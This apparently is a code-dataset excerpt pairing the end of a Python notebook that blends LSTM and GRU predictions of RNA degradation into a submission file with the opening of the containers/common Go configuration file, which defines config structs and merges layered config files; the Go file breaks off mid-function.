self.gru = nn.GRU(
input_size=embed_dim * 3+2,
hidden_size=hidden_dim,
num_layers=hidden_layers,
dropout=dropout,
bidirectional=True,
batch_first=True,
)
self.linear = nn.Linear(hidden_dim * 2, 5)
def forward(self, seqs):
embed = self.embeding(seqs[:,:,0:3].long())
reshaped = torch.reshape(embed, (-1, embed.shape[1], embed.shape[2] * embed.shape[3]))
reshaped= torch.cat((reshaped,seqs[:,:,3:5]),2)
output, hidden = self.gru(reshaped)
truncated = output[:, : self.pred_len, :]
out = self.linear(truncated)
return out
# In[13]:
LSTM_weights_path='../input/weight11/LSTM_ver20.pth'
def get_LSTM_model(seq_len=107, pred_len=68):
model = LSTM_model(seq_len=seq_len, pred_len=pred_len)
checkpoint = torch.load(LSTM_weights_path)
model.load_state_dict(checkpoint["model_state_dict"])
device = torch.device("cuda")
model.to(device)
model.eval()
return model
# In[14]:
GRU_weights_path='../input/weight11/GRU_ver8'
def get_GRU_model(seq_len=107, pred_len=68):
model = GRU_model(seq_len=seq_len, pred_len=pred_len)
checkpoint = torch.load(GRU_weights_path)
model.load_state_dict(checkpoint["model_state_dict"])
device = torch.device("cuda")
model.to(device)
model.eval()
return model
# In[15]:
with torch.no_grad():
model =get_LSTM_model()
prediction=model(test_public_inputs)
result_public_LSTM=prediction.to('cpu').detach().numpy().copy()
del prediction
with torch.no_grad():
model =get_LSTM_model(seq_len=130, pred_len=91)
prediction=model(test_private_inputs1)
result_private1_LSTM=prediction.to('cpu').detach().numpy().copy()
del prediction
with torch.no_grad():
model =get_LSTM_model(seq_len=130, pred_len=91)
prediction=model(test_private_inputs2)
result_private2_LSTM=prediction.to('cpu').detach().numpy().copy()
del prediction
# In[16]:
with torch.no_grad():
model =get_GRU_model()
prediction=model(test_public_inputs)
result_public_GRU=prediction.to('cpu').detach().numpy().copy()
del prediction
with torch.no_grad():
model =get_GRU_model(seq_len=130, pred_len=91)
prediction=model(test_private_inputs1)
result_private1_GRU=prediction.to('cpu').detach().numpy().copy()
del prediction
with torch.no_grad():
model =get_GRU_model(seq_len=130, pred_len=91)
prediction=model(test_private_inputs2)
result_private2_GRU=prediction.to('cpu').detach().numpy().copy()
del prediction
# In[17]:
df0 = pd.DataFrame(index=range(39), columns=['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',])
df0=df0.fillna(0)
# In[18]:
test_public_id=test_public['id']
idlist_public=test_public_id.values.tolist()
# In[19]:
test_private_id1=test_private_x1['id']
idlist_private1=test_private_id1.values.tolist()
idlist_private1[-5:]
# In[20]:
test_private_id2=test_private_x2['id']
idlist_private2=test_private_id2.values.tolist()
idlist_private2[:5]
# In[21]:
# Forcibly re-sort the predictions to match the sample submission order.
testindex=samplesub.loc[:,['id_seqpos']]
testindex=testindex.reset_index()
# In[22]:
df1 = pd.DataFrame(result_public_LSTM[0])
df1.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df1.insert(0, 'id_seqpos', 0)
df1=pd.concat([df1,df0])
id=idlist_public[0]
for i in range(len(df1)):
df1.iloc[i,0]=id+'_{}'.format(i)
for j in range (len(result_public_LSTM)-1):
id = idlist_public[j+1]
df2 = pd.DataFrame(result_public_LSTM[j+1])
df2.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df2.insert(0, 'id_seqpos', 0)
df2=pd.concat([df2,df0])
for i in range(len(df2)):
df2.iloc[i,0]=id+'_{}'.format(i)
df1=pd.concat([df1,df2])
public_dataframe=df1
df1 = pd.DataFrame(result_private1_LSTM[0])
df1.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df1.insert(0, 'id_seqpos', 0)
df1=pd.concat([df1,df0])
id=idlist_private1[0]
for i in range(len(df1)):
df1.iloc[i,0]=id+'_{}'.format(i)
for j in range (len(result_private1_LSTM)-1):
id = idlist_private1[j+1]
df2 = pd.DataFrame(result_private1_LSTM[j+1])
df2.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df2.insert(0, 'id_seqpos', 0)
df2=pd.concat([df2,df0])
for i in range(len(df2)):
df2.iloc[i,0]=id+'_{}'.format(i)
df1=pd.concat([df1,df2])
private_dataframe1=df1
df1 = pd.DataFrame(result_private2_LSTM[0])
df1.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df1.insert(0, 'id_seqpos', 0)
df1=pd.concat([df1,df0])
id=idlist_private2[0]
for i in range(len(df1)):
df1.iloc[i,0]=id+'_{}'.format(i)
for j in range (len(result_private2_LSTM)-1):
id = idlist_private2[j+1]
df2 = pd.DataFrame(result_private2_LSTM[j+1])
df2.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df2.insert(0, 'id_seqpos', 0)
df2=pd.concat([df2,df0])
for i in range(len(df2)):
df2.iloc[i,0]=id+'_{}'.format(i)
df1=pd.concat([df1,df2])
private_dataframe2=df1
# In[23]:
merged_dataframe=pd.concat([public_dataframe,private_dataframe1,private_dataframe2])
pre_submission_LSTM=pd.merge(testindex,merged_dataframe)
# In[24]:
pre_submission_LSTM
# In[25]:
df1 = pd.DataFrame(result_public_GRU[0])
df1.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df1.insert(0, 'id_seqpos', 0)
df1=pd.concat([df1,df0])
id=idlist_public[0]
for i in range(len(df1)):
df1.iloc[i,0]=id+'_{}'.format(i)
for j in range (len(result_public_GRU)-1):
id = idlist_public[j+1]
df2 = pd.DataFrame(result_public_GRU[j+1])
df2.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df2.insert(0, 'id_seqpos', 0)
df2=pd.concat([df2,df0])
for i in range(len(df2)):
df2.iloc[i,0]=id+'_{}'.format(i)
df1=pd.concat([df1,df2])
public_dataframe=df1
df1 = pd.DataFrame(result_private1_GRU[0])
df1.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df1.insert(0, 'id_seqpos', 0)
df1=pd.concat([df1,df0])
id=idlist_private1[0]
for i in range(len(df1)):
df1.iloc[i,0]=id+'_{}'.format(i)
for j in range (len(result_private1_GRU)-1):
id = idlist_private1[j+1]
df2 = pd.DataFrame(result_private1_GRU[j+1])
df2.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df2.insert(0, 'id_seqpos', 0)
df2=pd.concat([df2,df0])
for i in range(len(df2)):
df2.iloc[i,0]=id+'_{}'.format(i)
df1=pd.concat([df1,df2])
private_dataframe1=df1
df1 = pd.DataFrame(result_private2_GRU[0])
df1.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df1.insert(0, 'id_seqpos', 0)
df1=pd.concat([df1,df0])
id=idlist_private2[0]
for i in range(len(df1)):
df1.iloc[i,0]=id+'_{}'.format(i)
for j in range (len(result_private2_GRU)-1):
id = idlist_private2[j+1]
df2 = pd.DataFrame(result_private2_GRU[j+1])
df2.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df2.insert(0, 'id_seqpos', 0)
df2=pd.concat([df2,df0])
for i in range(len(df2)):
df2.iloc[i,0]=id+'_{}'.format(i)
df1=pd.concat([df1,df2])
private_dataframe2=df1
# In[26]:
merged_dataframe=pd.concat([public_dataframe,private_dataframe1,private_dataframe2])
pre_submission_GRU=pd.merge(testindex,merged_dataframe)
# In[27]:
blend_preds_df = pd.DataFrame()
blend_preds_df['id_seqpos']=pre_submission_GRU['id_seqpos']
blend_preds_df['reactivity'] = .5*pre_submission_GRU['reactivity'] + .5*pre_submission_LSTM['reactivity']
blend_preds_df['deg_Mg_pH10'] = .5*pre_submission_GRU['deg_Mg_pH10'] + .5*pre_submission_LSTM['deg_Mg_pH10']
blend_preds_df['deg_pH10'] = .5*pre_submission_GRU['deg_pH10'] + .5*pre_submission_LSTM['deg_pH10']
blend_preds_df['deg_Mg_50C'] = .5*pre_submission_GRU['deg_Mg_50C'] + .5*pre_submission_LSTM['deg_Mg_50C']
blend_preds_df['deg_50C'] = .5*pre_submission_GRU['deg_50C'] + .5*pre_submission_LSTM['deg_50C']
blend_preds_df
# In[28]:
blend_preds_df.to_csv("submission.csv", index=False)
|
[] |
[] |
[
"PYTHONHASHSEED"
] |
[]
|
["PYTHONHASHSEED"]
|
python
| 1 | 0 | |
vendor/github.com/containers/common/pkg/config/config.go
|
package config
import (
"fmt"
"os"
"os/exec"
"path/filepath"
"sort"
"strings"
"sync"
"github.com/BurntSushi/toml"
"github.com/containers/common/pkg/capabilities"
"github.com/containers/storage/pkg/unshare"
units "github.com/docker/go-units"
selinux "github.com/opencontainers/selinux/go-selinux"
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
)
const (
// _configPath is the path to the containers/containers.conf
// inside a given config directory.
_configPath = "containers/containers.conf"
// DefaultContainersConfig holds the default containers config path
DefaultContainersConfig = "/usr/share/" + _configPath
// OverrideContainersConfig holds the default config path overridden by the root user
OverrideContainersConfig = "/etc/" + _configPath
// UserOverrideContainersConfig holds the containers config path overridden by the rootless user
UserOverrideContainersConfig = ".config/" + _configPath
)
// RuntimeStateStore is a constant indicating which state store implementation
// should be used by engine
type RuntimeStateStore int
const (
// InvalidStateStore is an invalid state store
InvalidStateStore RuntimeStateStore = iota
// InMemoryStateStore is an in-memory state that will not persist data
// on containers and pods between engine instances or after system
// reboot
InMemoryStateStore RuntimeStateStore = iota
// SQLiteStateStore is a state backed by a SQLite database
// It is presently disabled
SQLiteStateStore RuntimeStateStore = iota
// BoltDBStateStore is a state backed by a BoltDB database
BoltDBStateStore RuntimeStateStore = iota
)
// Config contains configuration options for container tools
type Config struct {
// Containers specify settings that configure how containers will run on the system
Containers ContainersConfig `toml:"containers"`
// Engine specifies how the container engine based on Engine will run
Engine EngineConfig `toml:"engine"`
// Machine specifies configurations of podman machine VMs
Machine MachineConfig `toml:"machine"`
// Network section defines the configuration of CNI Plugins
Network NetworkConfig `toml:"network"`
// Secret section defines configurations for the secret management
Secrets SecretConfig `toml:"secrets"`
}
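// Minimal containers.conf sketch (illustrative values only) showing how the
// TOML tables map onto this struct:
//
//	[containers]
//	log_driver = "k8s-file"
//
//	[engine]
//	cgroup_manager = "systemd"
//
// Each top-level table is decoded into the field with the matching toml tag
// ("containers", "engine", "machine", "network", "secrets").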
// ContainersConfig represents the "containers" TOML config table
// containers global options for containers tools
type ContainersConfig struct {
// Devices to add to all containers
Devices []string `toml:"devices,omitempty"`
// Volumes to add to all containers
Volumes []string `toml:"volumes,omitempty"`
// ApparmorProfile is the apparmor profile name which is used as the
// default for the runtime.
ApparmorProfile string `toml:"apparmor_profile,omitempty"`
// Annotation to add to all containers
Annotations []string `toml:"annotations,omitempty"`
// Default way to create a cgroup namespace for the container
CgroupNS string `toml:"cgroupns,omitempty"`
// Default cgroup configuration
Cgroups string `toml:"cgroups,omitempty"`
// Capabilities to add to all containers.
DefaultCapabilities []string `toml:"default_capabilities,omitempty"`
// Sysctls to add to all containers.
DefaultSysctls []string `toml:"default_sysctls,omitempty"`
// DefaultUlimits specifies the default ulimits to apply to containers
DefaultUlimits []string `toml:"default_ulimits,omitempty"`
// DefaultMountsFile is the path to the default mounts file for testing
DefaultMountsFile string `toml:"-"`
// DNSServers set default DNS servers.
DNSServers []string `toml:"dns_servers,omitempty"`
// DNSOptions set default DNS options.
DNSOptions []string `toml:"dns_options,omitempty"`
// DNSSearches set default DNS search domains.
DNSSearches []string `toml:"dns_searches,omitempty"`
// EnableKeyring tells the container engines whether to create
// a kernel keyring for use within the container
EnableKeyring bool `toml:"keyring,omitempty"`
// EnableLabeling tells the container engines whether to use MAC
// Labeling to separate containers (SELinux)
EnableLabeling bool `toml:"label,omitempty"`
// Env is the environment variable list for container process.
Env []string `toml:"env,omitempty"`
// EnvHost Pass all host environment variables into the container.
EnvHost bool `toml:"env_host,omitempty"`
// HTTPProxy is the proxy environment variable list to apply to container process
HTTPProxy bool `toml:"http_proxy,omitempty"`
// Init tells container runtimes whether to run init inside the
// container that forwards signals and reaps processes.
Init bool `toml:"init,omitempty"`
// InitPath is the path for init to run if the Init bool is enabled
InitPath string `toml:"init_path,omitempty"`
// IPCNS indicates how to create an IPC namespace for the container
IPCNS string `toml:"ipcns,omitempty"`
// LogDriver for the container. For example: k8s-file and journald
LogDriver string `toml:"log_driver,omitempty"`
// LogSizeMax is the maximum number of bytes after which the log file
// will be truncated. It can be expressed as a human-friendly string
// that is parsed to bytes.
// Negative values indicate that the log file won't be truncated.
LogSizeMax int64 `toml:"log_size_max,omitempty,omitzero"`
// Specifies default format tag for container log messages.
// This is useful for creating a specific tag for container log messages.
// Containers logs default to truncated container ID as a tag.
LogTag string `toml:"log_tag,omitempty"`
// NetNS indicates how to create a network namespace for the container
NetNS string `toml:"netns,omitempty"`
// NoHosts tells container engine whether to create its own /etc/hosts
NoHosts bool `toml:"no_hosts,omitempty"`
// PidsLimit is the number of processes each container is restricted to
// by the cgroup process number controller.
PidsLimit int64 `toml:"pids_limit,omitempty,omitzero"`
// PidNS indicates how to create a pid namespace for the container
PidNS string `toml:"pidns,omitempty"`
// Copy the content from the underlying image into the newly created
// volume when the container is created instead of when it is started.
// If false, the container engine will not copy the content until
// the container is started. Setting it to true may have negative
// performance implications.
PrepareVolumeOnCreate bool `toml:"prepare_volume_on_create,omitempty"`
// RootlessNetworking depicts the "kind" of networking for rootless
// containers. Valid options are `slirp4netns` and `cni`. Default is
// `slirp4netns` on Linux, and `cni` on non-Linux OSes.
RootlessNetworking string `toml:"rootless_networking,omitempty"`
// SeccompProfile is the seccomp.json profile path which is used as the
// default for the runtime.
SeccompProfile string `toml:"seccomp_profile,omitempty"`
// ShmSize holds the size of /dev/shm.
ShmSize string `toml:"shm_size,omitempty"`
// TZ sets the timezone inside the container
TZ string `toml:"tz,omitempty"`
// Umask is the umask inside the container.
Umask string `toml:"umask,omitempty"`
// UTSNS indicates how to create a UTS namespace for the container
UTSNS string `toml:"utsns,omitempty"`
// UserNS indicates how to create a User namespace for the container
UserNS string `toml:"userns,omitempty"`
// UserNSSize defines how many UIDs to allocate for an automatically created user namespace
UserNSSize int `toml:"userns_size,omitempty,omitzero"`
}
// EngineConfig contains configuration options used to set up a engine runtime
type EngineConfig struct {
// CgroupCheck indicates the configuration has been rewritten after an
// upgrade to Fedora 31 to change the default OCI runtime for cgroup v2.
CgroupCheck bool `toml:"cgroup_check,omitempty"`
// CgroupManager is the cgroup manager to use. Valid values are "cgroupfs"
// and "systemd".
CgroupManager string `toml:"cgroup_manager,omitempty"`
// NOTE: when changing this struct, make sure to update (*Config).Merge().
// ConmonEnvVars are environment variables to pass to the Conmon binary
// when it is launched.
ConmonEnvVars []string `toml:"conmon_env_vars,omitempty"`
// ConmonPath is the path to the Conmon binary used for managing containers.
// The first path pointing to a valid file will be used.
ConmonPath []string `toml:"conmon_path,omitempty"`
// DetachKeys is the sequence of keys used to detach a container.
DetachKeys string `toml:"detach_keys,omitempty"`
// EnablePortReservation determines whether engine will reserve ports on the
// host when they are forwarded to containers. When enabled, when ports are
// forwarded to containers, they are held open by conmon as long as the
// container is running, ensuring that they cannot be reused by other
// programs on the host. However, this can cause significant memory usage if
// a container has many ports forwarded to it. Disabling this can save
// memory.
EnablePortReservation bool `toml:"enable_port_reservation,omitempty"`
// Environment variables to be used when running the container engine (e.g., Podman, Buildah). For example "http_proxy=internal.proxy.company.com"
Env []string `toml:"env,omitempty"`
// EventsLogFilePath is where the events log is stored.
EventsLogFilePath string `toml:"events_logfile_path,omitempty"`
// EventsLogger determines where events should be logged.
EventsLogger string `toml:"events_logger,omitempty"`
// graphRoot internal stores the location of the graphroot
graphRoot string
// HelperBinariesDir is a list of directories which are used to search for
// helper binaries.
HelperBinariesDir []string `toml:"helper_binaries_dir"`
// HooksDir holds paths to the directories containing hooks
// configuration files. When the same filename is present in
// multiple directories, the file in the directory listed last in
// this slice takes precedence.
HooksDir []string `toml:"hooks_dir,omitempty"`
// ImageBuildFormat (DEPRECATED) indicates the default image format for
// building container images. Use ImageDefaultFormat instead.
ImageBuildFormat string `toml:"image_build_format,omitempty"`
// ImageDefaultTransport is the default transport method used to fetch
// images.
ImageDefaultTransport string `toml:"image_default_transport,omitempty"`
// ImageParallelCopies indicates the maximum number of image layers
// to be copied simultaneously. If this is zero, container engines
// will fall back to containers/image defaults.
ImageParallelCopies uint `toml:"image_parallel_copies,omitempty,omitzero"`
// ImageDefaultFormat specifies the manifest type (oci, v2s2, or v2s1)
// to use when pulling, pushing, or building container images. By default,
// images pulled and pushed match the format of the source image.
// Building/committing defaults to OCI.
ImageDefaultFormat string `toml:"image_default_format,omitempty"`
// InfraCommand is the command run to start up a pod infra container.
InfraCommand string `toml:"infra_command,omitempty"`
// InfraImage is the image a pod infra container will use to manage
// namespaces.
InfraImage string `toml:"infra_image,omitempty"`
// InitPath is the path to the container-init binary.
InitPath string `toml:"init_path,omitempty"`
// LockType is the type of locking to use.
LockType string `toml:"lock_type,omitempty"`
// MachineEnabled indicates if Podman is running in a podman-machine VM
MachineEnabled bool `toml:"machine_enabled,omitempty"`
// MultiImageArchive - if true, the container engine allows for storing
// archives (e.g., of the docker-archive transport) with multiple
// images. By default, Podman creates single-image archives.
MultiImageArchive bool `toml:"multi_image_archive,omitempty"`
// Namespace is the engine namespace to use. Namespaces are used to create
// scopes to separate containers and pods in the state. When namespace is
// set, engine will only view containers and pods in the same namespace. All
// containers and pods created will default to the namespace set here. A
// namespace of "", the empty string, is equivalent to no namespace, and all
// containers and pods will be visible. The default namespace is "".
Namespace string `toml:"namespace,omitempty"`
// NetworkCmdPath is the path to the slirp4netns binary.
NetworkCmdPath string `toml:"network_cmd_path,omitempty"`
// NetworkCmdOptions is the default options to pass to the slirp4netns binary.
// For example "allow_host_loopback=true"
NetworkCmdOptions []string `toml:"network_cmd_options,omitempty"`
// NoPivotRoot sets whether to set no-pivot-root in the OCI runtime.
NoPivotRoot bool `toml:"no_pivot_root,omitempty"`
// NumLocks is the number of locks to make available for containers and
// pods.
NumLocks uint32 `toml:"num_locks,omitempty,omitzero"`
// OCIRuntime is the OCI runtime to use.
OCIRuntime string `toml:"runtime,omitempty"`
// OCIRuntimes are the set of configured OCI runtimes (default is runc).
OCIRuntimes map[string][]string `toml:"runtimes,omitempty"`
// PullPolicy determines whether to pull an image before creating or running a
// container. The default is "missing".
PullPolicy string `toml:"pull_policy,omitempty"`
// Indicates whether the application should be running in Remote mode
Remote bool `toml:"remote,omitempty"`
// RemoteURI is deprecated, see ActiveService.
// RemoteURI contains connection information used to connect to a remote system.
RemoteURI string `toml:"remote_uri,omitempty"`
// RemoteIdentity is deprecated, see ServiceDestinations.
// RemoteIdentity is the key file for RemoteURI.
RemoteIdentity string `toml:"remote_identity,omitempty"`
// ActiveService is the name of the destination in ServiceDestinations to use (added in v2.0.3)
ActiveService string `toml:"active_service,omitempty"`
// ServiceDestinations holds remote service destinations, mapped by service name
ServiceDestinations map[string]Destination `toml:"service_destinations,omitempty"`
// RuntimePath is the path to the OCI runtime binary for launching containers.
// The first path pointing to a valid file will be used. This is used only
// when there are no OCIRuntime/OCIRuntimes defined. It is used only to be
// backward compatible with older versions of Podman.
RuntimePath []string `toml:"runtime_path,omitempty"`
// RuntimeSupportsJSON is the list of the OCI runtimes that support
// --format=json.
RuntimeSupportsJSON []string `toml:"runtime_supports_json,omitempty"`
// RuntimeSupportsNoCgroups is a list of OCI runtimes that support
// running containers without CGroups.
RuntimeSupportsNoCgroups []string `toml:"runtime_supports_nocgroup,omitempty"`
// RuntimeSupportsKVM is a list of OCI runtimes that support
// KVM separation for containers.
RuntimeSupportsKVM []string `toml:"runtime_supports_kvm,omitempty"`
// SetOptions contains a subset of config options. It's used to indicate if
// a given option has either been set by the user or by the parsed
// configuration file. If not, the corresponding option might be
// overwritten by values from the database. This behavior guarantees
// backwards compatibility with older versions of libpod and Podman.
SetOptions
// SignaturePolicyPath is the path to a signature policy to use for
// validating images. If left empty, the containers/image default signature
// policy will be used.
SignaturePolicyPath string `toml:"-"`
// SDNotify tells container engine to allow containers to notify the host systemd of
// readiness using the SD_NOTIFY mechanism.
SDNotify bool `toml:"-"`
// StateType is the type of the backing state store. Avoid using multiple
// values for this with the same containers/storage configuration on the
// same system. Different state types do not interact, and each will see a
// separate set of containers, which may cause conflicts in
// containers/storage. As such this is not exposed via the config file.
StateType RuntimeStateStore `toml:"-"`
// ServiceTimeout is the number of seconds to wait without a connection
// before the `podman system service` times out and exits
ServiceTimeout uint `toml:"service_timeout,omitempty,omitzero"`
// StaticDir is the path to a persistent directory to store container
// files.
StaticDir string `toml:"static_dir,omitempty"`
// StopTimeout is the number of seconds to wait for a container to exit
// before sending the kill signal.
StopTimeout uint `toml:"stop_timeout,omitempty,omitzero"`
// ImageCopyTmpDir is the default location for storing temporary
// container image content. It can be overridden with the TMPDIR
// environment variable. If you specify "storage", then the
// location of the container/storage tmp directory will be used.
ImageCopyTmpDir string `toml:"image_copy_tmp_dir,omitempty"`
// TmpDir is the path to a temporary directory to store per-boot container
// files. Must be stored in a tmpfs.
TmpDir string `toml:"tmp_dir,omitempty"`
// VolumePath is the default location that named volumes will be created
// under. This convention is followed by the default volume driver, but
// may not be by other drivers.
VolumePath string `toml:"volume_path,omitempty"`
// VolumePlugins is a set of plugins that can be used as the backend for
// Podman named volumes. Each volume is specified as a name (what Podman
// will refer to the plugin as) mapped to a path, which must point to a
// Unix socket that conforms to the Volume Plugin specification.
VolumePlugins map[string]string `toml:"volume_plugins,omitempty"`
// ChownCopiedFiles tells the container engine whether to chown files copied
// into a container to the container's primary uid/gid.
ChownCopiedFiles bool `toml:"chown_copied_files,omitempty"`
}
// SetOptions contains a subset of options in a Config. It's used to indicate if
// a given option has either been set by the user or by a parsed engine
// configuration file. If not, the corresponding option might be overwritten by
// values from the database. This behavior guarantees backwards compat with
// older versions of libpod and Podman.
type SetOptions struct {
// StorageConfigRunRootSet indicates if the RunRoot has been explicitly set
// by the config or by the user. It's required to guarantee backwards
// compatibility with older versions of libpod for which we must query the
// database configuration. Not included in the on-disk config.
StorageConfigRunRootSet bool `toml:"-"`
// StorageConfigGraphRootSet indicates if the GraphRoot has been explicitly
// set by the config or by the user. It's required to guarantee backwards
// compatibility with older versions of libpod for which we must query the
// database configuration. Not included in the on-disk config.
StorageConfigGraphRootSet bool `toml:"-"`
// StorageConfigGraphDriverNameSet indicates if the GraphDriverName has been
// explicitly set by the config or by the user. It's required to guarantee
// backwards compatibility with older versions of libpod for which we must
// query the database configuration. Not included in the on-disk config.
StorageConfigGraphDriverNameSet bool `toml:"-"`
// StaticDirSet indicates if the StaticDir has been explicitly set by the
// config or by the user. It's required to guarantee backwards compatibility
// with older versions of libpod for which we must query the database
// configuration. Not included in the on-disk config.
StaticDirSet bool `toml:"-"`
// VolumePathSet indicates if the VolumePath has been explicitly set by the
// config or by the user. It's required to guarantee backwards compatibility
// with older versions of libpod for which we must query the database
// configuration. Not included in the on-disk config.
VolumePathSet bool `toml:"-"`
// TmpDirSet indicates if the TmpDir has been explicitly set by the config
// or by the user. It's required to guarantee backwards compatibility with
// older versions of libpod for which we must query the database
// configuration. Not included in the on-disk config.
TmpDirSet bool `toml:"-"`
}
// NetworkConfig represents the "network" TOML config table
type NetworkConfig struct {
// NetworkBackend determines what backend should be used for Podman's
// networking.
NetworkBackend string `toml:"network_backend,omitempty"`
// CNIPluginDirs is where CNI plugin binaries are stored.
CNIPluginDirs []string `toml:"cni_plugin_dirs,omitempty"`
// DefaultNetwork is the network name of the default CNI network
// to attach pods to.
DefaultNetwork string `toml:"default_network,omitempty"`
// DefaultSubnet is the subnet to be used for the default CNI network.
// If a network with the name given in DefaultNetwork is not present
// then a new network using this subnet will be created.
// Must be a valid IPv4 CIDR block.
DefaultSubnet string `toml:"default_subnet,omitempty"`
// NetworkConfigDir is where CNI network configuration files are stored.
NetworkConfigDir string `toml:"network_config_dir,omitempty"`
}
// SecretConfig represents the "secret" TOML config table
type SecretConfig struct {
// Driver specifies the secret driver to use.
// Current valid value:
// * file
// * pass
Driver string `toml:"driver,omitempty"`
// Opts contains driver specific options
Opts map[string]string `toml:"opts,omitempty"`
}
// MachineConfig represents the "machine" TOML config table
type MachineConfig struct {
// CPUs is the number of CPUs a machine is created with.
CPUs uint64 `toml:"cpus,omitempty,omitzero"`
// DiskSize is the size of the disk in GB created when init-ing a podman-machine VM
DiskSize uint64 `toml:"disk_size,omitempty,omitzero"`
// Image is the image used when init-ing a podman-machine VM
Image string `toml:"image,omitempty"`
// Memory in MB a machine is created with.
Memory uint64 `toml:"memory,omitempty,omitzero"`
}
// Destination represents destination for remote service
type Destination struct {
// URI, required. Example: ssh://[email protected]:22/run/podman/podman.sock
URI string `toml:"uri"`
// Identity file with ssh key, optional
Identity string `toml:"identity,omitempty"`
}
// NewConfig creates a new Config. It starts with an empty config and, if
// specified, merges the config at `userConfigPath` path. Depending on whether
// we're running as root or rootless, we then merge the system configuration,
// followed by merging the default config (hard-coded default in memory).
// Note that the OCI runtime is hard-set to `crun` if we're running on a system
// with cgroup v2. Other OCI runtimes do not yet support cgroup v2. This
// might change in the future.
func NewConfig(userConfigPath string) (*Config, error) {
// Generate the default config for the system
config, err := DefaultConfig()
if err != nil {
return nil, err
}
// Now, gather the system configs and merge them as needed.
configs, err := systemConfigs()
if err != nil {
return nil, errors.Wrap(err, "finding config on system")
}
for _, path := range configs {
// Merge changes in later configs with the previous configs.
// Fields specified in each later config file override the
// corresponding fields from previous files.
if err = readConfigFromFile(path, config); err != nil {
return nil, errors.Wrapf(err, "reading system config %q", path)
}
logrus.Debugf("Merged system config %q", path)
logrus.Tracef("%+v", config)
}
// If the caller specified a config path to use, then we read it to
// override the system defaults.
if userConfigPath != "" {
var err error
// readConfigFromFile reads in container config in the specified
// file and then merge changes with the current default.
if err = readConfigFromFile(userConfigPath, config); err != nil {
return nil, errors.Wrapf(err, "reading user config %q", userConfigPath)
}
logrus.Debugf("Merged user config %q", userConfigPath)
logrus.Tracef("%+v", config)
}
config.addCAPPrefix()
if err := config.Validate(); err != nil {
return nil, err
}
if err := config.setupEnv(); err != nil {
return nil, err
}
return config, nil
}
// readConfigFromFile reads the specified config file at `path` and attempts to
// unmarshal its content into a Config. The config param specifies the previous
// default config. If the file at `path` only specifies a few fields,
// the defaults from the config parameter will be used for all other fields.
func readConfigFromFile(path string, config *Config) error {
logrus.Tracef("Reading configuration file %q", path)
meta, err := toml.DecodeFile(path, config)
if err != nil {
return errors.Wrapf(err, "decode configuration %v", path)
}
keys := meta.Undecoded()
if len(keys) > 0 {
logrus.Debugf("Failed to decode the keys %q from %q.", keys, path)
}
return nil
}
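// Illustrative note (editor's addition, not upstream documentation): because later
// files only override the fields they actually set, a drop-in file such as
// /etc/containers/containers.conf.d/50-engine.conf can stay minimal, for example:
//
//	[engine]
//	cgroup_manager = "systemd"
//	num_locks = 2048
//
// All other fields keep the values merged from earlier configuration files.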
// addConfigs will search one level in the config dirPath for config files
// If the dirPath does not exist, addConfigs will return nil
func addConfigs(dirPath string, configs []string) ([]string, error) {
newConfigs := []string{}
err := filepath.Walk(dirPath,
// WalkFunc to read additional configs
func(path string, info os.FileInfo, err error) error {
switch {
case err != nil:
// return error (could be a permission problem)
return err
case info == nil:
// this should only happen when err != nil but let's be sure
return nil
case info.IsDir():
if path != dirPath {
// make sure to not recurse into sub-directories
return filepath.SkipDir
}
// ignore directories
return nil
default:
// only add *.conf files
if strings.HasSuffix(path, ".conf") {
newConfigs = append(newConfigs, path)
}
return nil
}
},
)
if os.IsNotExist(err) {
err = nil
}
sort.Strings(newConfigs)
return append(configs, newConfigs...), err
}
// Returns the list of configuration files, if they exist, in order of hierarchy.
// The files are read in order and each new file can/will override previous
// file settings.
func systemConfigs() ([]string, error) {
var err error
configs := []string{}
path := os.Getenv("CONTAINERS_CONF")
if path != "" {
if _, err := os.Stat(path); err != nil {
return nil, errors.Wrap(err, "CONTAINERS_CONF file")
}
return append(configs, path), nil
}
if _, err := os.Stat(DefaultContainersConfig); err == nil {
configs = append(configs, DefaultContainersConfig)
}
if _, err := os.Stat(OverrideContainersConfig); err == nil {
configs = append(configs, OverrideContainersConfig)
}
configs, err = addConfigs(OverrideContainersConfig+".d", configs)
if err != nil {
return nil, err
}
path, err = ifRootlessConfigPath()
if err != nil {
return nil, err
}
if path != "" {
if _, err := os.Stat(path); err == nil {
configs = append(configs, path)
}
configs, err = addConfigs(path+".d", configs)
if err != nil {
return nil, err
}
}
return configs, nil
}
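// Illustrative note (editor's addition): setting the CONTAINERS_CONF environment
// variable short-circuits the hierarchy above; when it points at a file, that file
// is the only configuration read on top of the built-in defaults, which is handy
// for tests, e.g. CONTAINERS_CONF=/tmp/test-containers.conf (hypothetical path).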
// CheckCgroupsAndAdjustConfig checks if we're running rootless with the systemd
// cgroup manager. If the user session isn't available, it switches the
// cgroup manager to cgroupfs. Note that this only applies to rootless.
func (c *Config) CheckCgroupsAndAdjustConfig() {
if !unshare.IsRootless() || c.Engine.CgroupManager != SystemdCgroupsManager {
return
}
session := os.Getenv("DBUS_SESSION_BUS_ADDRESS")
hasSession := session != ""
if hasSession {
for _, part := range strings.Split(session, ",") {
if strings.HasPrefix(part, "unix:path=") {
_, err := os.Stat(strings.TrimPrefix(part, "unix:path="))
hasSession = err == nil
break
}
}
}
if !hasSession && unshare.GetRootlessUID() != 0 {
